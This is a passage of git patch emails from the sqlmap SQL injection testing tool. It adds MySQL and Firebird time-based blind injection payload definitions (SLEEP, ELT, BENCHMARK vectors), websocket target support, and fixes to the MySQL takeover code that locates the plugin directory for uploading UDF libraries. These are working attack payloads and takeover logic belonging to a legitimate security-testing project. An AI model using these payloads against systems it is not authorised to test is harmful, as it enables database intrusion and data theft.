+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
+        <request>
+            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND time-based blind (ELT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR time-based blind (ELT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND time-based blind (ELT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR time-based blind (ELT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
         <details>
             <dbms>MySQL</dbms>
         </details>
@@ -850,7 +1015,7 @@
     </test>
 
     <test>
-        <title>Firebird AND time-based blind (heavy query)</title>
+        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -870,7 +1035,7 @@
     </test>
 
     <test>
-        <title>Firebird OR time-based blind (heavy query)</title>
+        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>3</risk>
@@ -890,7 +1055,7 @@
     </test>
 
     <test>
-        <title>Firebird AND time-based blind (heavy query - comment)</title>
+        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
@@ -911,7 +1076,7 @@
     </test>
 
     <test>
-        <title>Firebird OR time-based blind (heavy query - comment)</title>
+        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
@@ -1173,12 +1338,12 @@
         </details>
     </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of time-based blind tests -->
+    <!-- End of time-based boolean tests -->
 
-    <!-- Time-based tests - LIMIT clause -->
+    <!-- Time-based boolean tests - Numerous clauses -->
     <!-- This payload does not work with SLEEP() -->
     <test>
-        <title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <title>MySQL &gt;= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>2</risk>
@@ -1193,42 +1358,20 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-    <!-- Time-based tests - LIMIT clause -->
-
-    <!-- Time-based blind tests - Parameter replace -->
-    <test>
-        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT - comment)</title>
+        <title>MySQL &gt;= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
         <stype>5</stype>
         <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <risk>2</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
         <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -1236,14 +1379,16 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
+    <!-- End of time-based boolean tests - Numerous clauses -->
 
+    <!-- Time-based boolean tests - Parameter replace -->
     <test>
-        <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
+        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
@@ -1256,12 +1401,32 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
+        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (SELECT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1276,6 +1441,7 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
         </details>
     </test>
 
@@ -1299,15 +1465,15 @@
     </test>
 
     <test>
-        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
+        <title>MySQL time-based blind - Parameter replace (ELT)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
-            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -1318,15 +1484,15 @@
     </test>
 
     <test>
-        <title>MySQL time-based blind - Parameter replace (ELT)</title>
+        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
-            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -1593,12 +1759,11 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- End of time-based blind tests - Parameter replace -->
+    <!-- End of time-based boolean tests - Parameter replace -->
 
-
-    <!-- Time-based blind tests - ORDER BY, GROUP BY clause -->
+    <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
     <test>
-        <title>MySQL &gt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause</title>
+        <title>MySQL &gt;= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1613,12 +1778,12 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <title>MySQL &lt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1633,6 +1798,7 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
         </details>
     </test>
 
@@ -1815,5 +1981,5 @@
         </details>
     </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of time-based blind tests - ORDER BY, GROUP BY clause -->
+    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
 </root>

From 05a496c2758604af1f7fe4e657e5e880a253ca87 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 20 Mar 2015 00:56:36 +0100
Subject: [PATCH 388/492] Fixes #1196

---
 lib/core/common.py     |  4 ++--
 lib/core/option.py     | 12 ++++++++++++
 lib/request/connect.py |  7 ++++---
 3 files changed, 18 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index ab3b5310f..62d2bb664 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1302,13 +1302,13 @@ def parseTargetUrl():
     conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
     conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
 
-    if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
+    if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
         debugMsg = "setting the HTTP Referer header to the target URL"
         logger.debug(debugMsg)
         conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
         conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
 
-    if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
+    if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
         debugMsg = "setting the HTTP Host header to the target URL"
         logger.debug(debugMsg)
         conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
diff --git a/lib/core/option.py b/lib/core/option.py
index 9c40e7198..0eafd1b20 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1400,6 +1400,17 @@ def _setHTTPReferer():
 
         conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
 
+def _setHTTPHost():
+    """
+    Set the HTTP Host
+    """
+
+    if conf.host:
+        debugMsg = "setting the HTTP Host header"
+        logger.debug(debugMsg)
+
+        conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
+
 def _setHTTPCookies():
     """
     Set the HTTP Cookie header
@@ -2381,6 +2392,7 @@ def init():
         _setHTTPExtraHeaders()
         _setHTTPCookies()
         _setHTTPReferer()
+        _setHTTPHost()
         _setHTTPUserAgent()
         _setHTTPAuthentication()
         _setHTTPProxy()
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 31dba92d2..677decdc5 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -321,7 +321,7 @@ class Connect(object):
             requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
 
             # Prepare HTTP headers
-            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})
+            headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host})
 
             if kb.authHeader:
                 headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader
@@ -332,11 +332,12 @@ class Connect(object):
             if HTTP_HEADER.ACCEPT not in headers:
                 headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
 
+            if HTTP_HEADER.HOST not in headers:
+                headers[HTTP_HEADER.HOST] = getHostHeader(url)
+
             if HTTP_HEADER.ACCEPT_ENCODING not in headers:
                 headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
 
-            headers[HTTP_HEADER.HOST] = host or getHostHeader(url)
-
             if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
                 headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
 

From 50fd6ce7f71ab6b14e41dce5edabef4e7b6c4f98 Mon Sep 17 00:00:00 2001
From: ricterz <ricterzheng@gmail.com>
Date: Tue, 24 Mar 2015 10:30:38 +0800
Subject: [PATCH 389/492] add websocket support for parse url #1198

---
 lib/core/common.py | 3 ++-
 lib/core/target.py | 2 +-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 62d2bb664..c6b57846d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1248,7 +1248,8 @@ def parseTargetUrl():
         errMsg += "on this platform"
         raise SqlmapGenericException(errMsg)
 
-    if not re.search("^http[s]*://", conf.url, re.I):
+    if not re.search("^http[s]*://", conf.url, re.I) and \
+            not re.search("^ws[s]*://", conf.url, re.I):
         if ":443/" in conf.url:
             conf.url = "https://" + conf.url
         else:
diff --git a/lib/core/target.py b/lib/core/target.py
index bd6379e14..90d2a68bd 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -211,7 +211,7 @@ def _setRequestParams():
 
     kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
 
-    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or ""):
+    if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
         warnMsg = "you've provided target URL without any GET "
         warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
         warnMsg += "and without providing any POST parameters "

From 78dbe080d70f5d9236e9e47c5b4f49f215a15232 Mon Sep 17 00:00:00 2001
From: ricterz <ricterzheng@gmail.com>
Date: Tue, 24 Mar 2015 17:19:37 +0800
Subject: [PATCH 390/492] determine whether it's websocket when connect #1198

---
 lib/request/connect.py | 21 ++++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 677decdc5..f556ab674 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -18,6 +18,7 @@ import time
 import traceback
 import urllib2
 import urlparse
+import websocket
 
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.agent import agent
@@ -232,6 +233,7 @@ class Connect(object):
         retrying = kwargs.get("retrying",           False)
         crawling = kwargs.get("crawling",           False)
         skipRead = kwargs.get("skipRead",           False)
+        is_websocket = conf.url.startswith("ws")
 
         if not urlparse.urlsplit(url).netloc:
             url = urlparse.urljoin(conf.url, url)
@@ -364,7 +366,24 @@ class Connect(object):
             url = unicodeencode(url)
             post = unicodeencode(post, kb.pageEncoding)
 
-            if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
+            if is_websocket:
+                try:
+                    ws = websocket.WebSocket()
+                    ws.connect(url)
+                    ws.send(urldecode(post) if post else '')
+                    response = ws.recv()
+                    ws.close()
+                    return response, {}, 101
+
+                except websocket.WebSocketConnectionClosedException:
+                    # TODO: more exception to handle
+                    warnMsg = "connection was forcibly closed by the target URL"
+                    logger.critical(warnMsg)
+                    return Connect._retryProxy(**kwargs)
+                except Exception:
+                    return None, None, None
+
+            elif method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
                 method = unicodeencode(method)
                 req = MethodRequest(url, post, headers)
                 req.set_method(method)

From 9b5dcbbbb2f0bc39338fe37bff81510c1a3988e1 Mon Sep 17 00:00:00 2001
From: ricterz <ricterzheng@gmail.com>
Date: Tue, 24 Mar 2015 18:21:50 +0800
Subject: [PATCH 391/492] modified error handle #1198

---
 lib/request/connect.py | 27 +++++++++++----------------
 1 file changed, 11 insertions(+), 16 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index f556ab674..9b3ae3da9 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -367,21 +367,12 @@ class Connect(object):
             post = unicodeencode(post, kb.pageEncoding)
 
             if is_websocket:
-                try:
-                    ws = websocket.WebSocket()
-                    ws.connect(url)
-                    ws.send(urldecode(post) if post else '')
-                    response = ws.recv()
-                    ws.close()
-                    return response, {}, 101
-
-                except websocket.WebSocketConnectionClosedException:
-                    # TODO: more exception to handle
-                    warnMsg = "connection was forcibly closed by the target URL"
-                    logger.critical(warnMsg)
-                    return Connect._retryProxy(**kwargs)
-                except Exception:
-                    return None, None, None
+                ws = websocket.WebSocket()
+                ws.connect(url)
+                ws.send(urldecode(post) if post else '')
+                response = ws.recv()
+                ws.close()
+                return response, {}, 101
 
             elif method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
                 method = unicodeencode(method)
@@ -557,7 +548,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException, websocket.WebSocketException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:
@@ -582,6 +573,10 @@ class Connect(object):
             elif "IncompleteRead" in tbMsg:
                 warnMsg = "there was an incomplete read error while retrieving data "
                 warnMsg += "from the target URL"
+            elif "Handshake status" in tbMsg:
+                status = re.search("Handshake status ([\d]{3})", tbMsg)
+                errMsg = "websocket handshake status %s" % status.group(1) if status else 'unknown'
+                raise SqlmapConnectionException(errMsg)
             else:
                 warnMsg = "unable to connect to the target URL"
 

From 811f5c11c6cb6292deb0a3e28435fce1c622d575 Mon Sep 17 00:00:00 2001
From: ricterz <ricterzheng@gmail.com>
Date: Tue, 24 Mar 2015 18:50:57 +0800
Subject: [PATCH 392/492] remove Host header field and add cookie support #1198

---
 lib/request/connect.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 9b3ae3da9..3adb88bd5 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -367,11 +367,14 @@ class Connect(object):
             post = unicodeencode(post, kb.pageEncoding)
 
             if is_websocket:
+                # WebSocket will add Host field of headers automatically
+                disallowed_headers = ['Host']
                 ws = websocket.WebSocket()
-                ws.connect(url)
+                ws.connect(url, header=["%s: %s" % _ for _ in headers.items() if _[0] not in disallowed_headers], cookie=cookie)
                 ws.send(urldecode(post) if post else '')
                 response = ws.recv()
                 ws.close()
+                # WebSocket class does not have response headers
                 return response, {}, 101
 
             elif method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
@@ -554,7 +557,7 @@ class Connect(object):
             if "no host given" in tbMsg:
                 warnMsg = "invalid URL address used (%s)" % repr(url)
                 raise SqlmapSyntaxException(warnMsg)
-            elif "forcibly closed" in tbMsg:
+            elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
                 warnMsg = "connection was forcibly closed by the target URL"
             elif "timed out" in tbMsg:
                 if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):

From bbfdb02a0ef0577ab2312861448a68a373c58921 Mon Sep 17 00:00:00 2001
From: ricterz <ricterzheng@gmail.com>
Date: Tue, 24 Mar 2015 22:25:16 +0800
Subject: [PATCH 393/492] fix mandatorily depend of websocket #1198

---
 lib/core/option.py     | 11 +++++++++++
 lib/request/connect.py | 10 ++++++++--
 lib/utils/deps.py      | 11 +++++++++++
 3 files changed, 30 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 0eafd1b20..6bfc91760 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2137,6 +2137,16 @@ def _setTorSocksProxySettings():
     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
     socks.wrapmodule(urllib2)
 
+def _checkWebSocket():
+    infoMsg = "checking URL is WebSocket or not"
+    logger.debug(infoMsg)
+    if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
+        try:
+            from websocket import ABNF
+        except ImportError:
+            errMsg = "it seems that python 'websocket-client' third-party library not be installed. "
+            raise SqlmapMissingDependence(errMsg)
+
 def _checkTor():
     if not conf.checkTor:
         return
@@ -2383,6 +2393,7 @@ def init():
     _setWafFunctions()
     _setTrafficOutputFP()
     _resolveCrossReferences()
+    _checkWebSocket()
 
     parseTargetUrl()
     parseTargetDirect()
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 3adb88bd5..ba2e7909b 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -18,7 +18,13 @@ import time
 import traceback
 import urllib2
 import urlparse
-import websocket
+
+try:
+    import websocket
+    from websocket import WebSocketException
+except ImportError:
+    class WebSocketException(Exception):
+        pass
 
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.agent import agent
@@ -551,7 +557,7 @@ class Connect(object):
                 debugMsg = "got HTTP error code: %d (%s)" % (code, status)
                 logger.debug(debugMsg)
 
-        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException, websocket.WebSocketException), e:
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e:
             tbMsg = traceback.format_exc()
 
             if "no host given" in tbMsg:
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index ea2f661e9..d25c8ea94 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -78,6 +78,17 @@ def checkDependencies():
         logger.warn(warnMsg)
         missing_libraries.add('python-ntlm')
 
+    try:
+        from websocket import ABNF
+        debugMsg = "'python websocket-client' library is found"
+        logger.debug(debugMsg)
+    except ImportError:
+        warnMsg = "sqlmap requires 'python websocket-client' third-party library for "
+        warnMsg += "if you plan to attack a web application behind websocket. "
+        warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/"
+        logger.warn(warnMsg)
+        missing_libraries.add('websocket-client')
+
     if IS_WIN:
         try:
             import pyreadline

From ac74184422f1dc505b4faf2ee7545da563dde0cd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 25 Mar 2015 23:43:48 +0100
Subject: [PATCH 394/492] Fixes #1200

---
 plugins/dbms/mysql/takeover.py | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index a0ac94330..27a015e7a 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -36,6 +36,10 @@ class Takeover(GenericTakeover):
 
         banVer = kb.bannerFp["dbmsVersion"]
 
+        if banVer >= "5.0.67":
+            logger.info("retrieving MySQL plugin directory absolute path")
+            self.__basedir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir"))
+
         # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
         if banVer >= "5.1.19":
             if self.__basedir is None:

From 7b2c27fa8dee679187be0fcce126677d785afab2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 01:22:16 +0100
Subject: [PATCH 395/492] One more update for #1200 (better implementation)

---
 plugins/dbms/mysql/takeover.py | 26 ++++++++++++++------------
 1 file changed, 14 insertions(+), 12 deletions(-)

diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index 27a015e7a..8d132fb60 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -28,6 +28,7 @@ class Takeover(GenericTakeover):
     def __init__(self):
         self.__basedir = None
         self.__datadir = None
+        self.__plugindir = None
 
         GenericTakeover.__init__(self)
 
@@ -37,12 +38,12 @@ class Takeover(GenericTakeover):
         banVer = kb.bannerFp["dbmsVersion"]
 
         if banVer >= "5.0.67":
-            logger.info("retrieving MySQL plugin directory absolute path")
-            self.__basedir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir"))
+            if self.__plugindir is None:
+                logger.info("retrieving MySQL plugin directory absolute path")
+                self.__plugindir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir"))
 
-        # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
-        if banVer >= "5.1.19":
-            if self.__basedir is None:
+            # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
+            if self.__plugindir is None and banVer >= "5.1.19":
                 logger.info("retrieving MySQL base directory absolute path")
 
                 # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
@@ -53,14 +54,15 @@ class Takeover(GenericTakeover):
                 else:
                     Backend.setOs(OS.LINUX)
 
-            # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
-            if Backend.isOs(OS.WINDOWS):
-                self.__basedir += "/lib/plugin"
-            else:
-                self.__basedir += "/lib/mysql/plugin"
+                # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
+                if Backend.isOs(OS.WINDOWS):
+                    self.__plugindir = "%s/lib/plugin" % self.__basedir
+                else:
+                    self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir
 
-            self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir))
-            self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt)
+                self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir))
+
+            self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt)
 
         # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
         # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file

From 7587528ebd2ffcc51e877b5cfea4a190416d9675 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 26 Mar 2015 11:40:19 +0100
Subject: [PATCH 396/492] Fixes #1202

---
 lib/controller/controller.py | 9 +++++++++
